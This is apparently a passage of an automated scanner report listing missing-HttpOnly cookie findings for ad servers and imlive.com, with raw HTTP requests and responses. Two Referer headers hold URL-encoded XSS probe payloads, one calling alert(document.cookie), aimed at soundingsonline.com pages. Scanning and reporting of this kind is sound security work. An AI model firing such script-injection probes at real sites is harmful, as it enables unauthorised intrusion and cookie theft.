Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:04:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:05:26 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/53616777/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:05:12 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/53616777/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:04:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:05:12 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/537212856/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:53 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/537212856/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:03:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:53 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/702021509/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:57 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/702021509/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:03:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:57 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:32 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670 HTTP/1.1
Host: network.realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; OAX=rcHW800pDrcAAovp; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; S247S=1; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:03:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 279
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 05:04:32 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

11.492. http://nl.imlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nl.imlive.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=172f260c-f292-40e5-922e-4377befca272&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:14 GMT; path=/
inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.493. http://nl.imlive.com/waccess/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nl.imlive.com
Path:	/waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=ae572f88-2060-40b2-aba3-4ce30fcd11c6&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:15 GMT; path=/
inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
pnl=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:15 GMT; path=/
BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=osjefprzc5csv3ig1lb2mi55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=osjefprzc5csv3ig1lb2mi55; path=/; HttpOnly
Set-Cookie: spvdr=vd=ae572f88-2060-40b2-aba3-4ce30fcd11c6&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:15 GMT; path=/
Set-Cookie: inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pnl=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:15 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:15 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

11.494. http://no.imlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://no.imlive.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=cb56a9d1-56fd-458b-a829-3574e99ee9f7&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:16 GMT; path=/
ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.495. http://no.imlive.com/waccess/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://no.imlive.com
Path:	/waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=19138eb1-cd59-48bc-a99d-570e8f866ba1&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:17 GMT; path=/
ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
pno=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:17 GMT; path=/
BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=0pnbhzmycjmm1k45emjzeay5; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0pnbhzmycjmm1k45emjzeay5; path=/; HttpOnly
Set-Cookie: spvdr=vd=19138eb1-cd59-48bc-a99d-570e8f866ba1&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:17 GMT; path=/
Set-Cookie: ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pno=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:17 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:17 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

11.496. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1204429614@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1204429614@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1204429614@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 15:00:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4927
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/90261661/Middle/D
...[SNIP]...

11.497. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1244397821@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1244397821@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1244397821@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services/preview-current-issue?4df85%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ebb520f082cd=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:31:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4934
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247919265/Middle
...[SNIP]...

11.498. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1494452952@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1494452952@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1494452952@Top,Middle,Right,Right1,x01,x02,x03,x04 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:05:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4540
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/671207635/Middle/
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247919265/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247919265/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/126580716/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/126580716/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
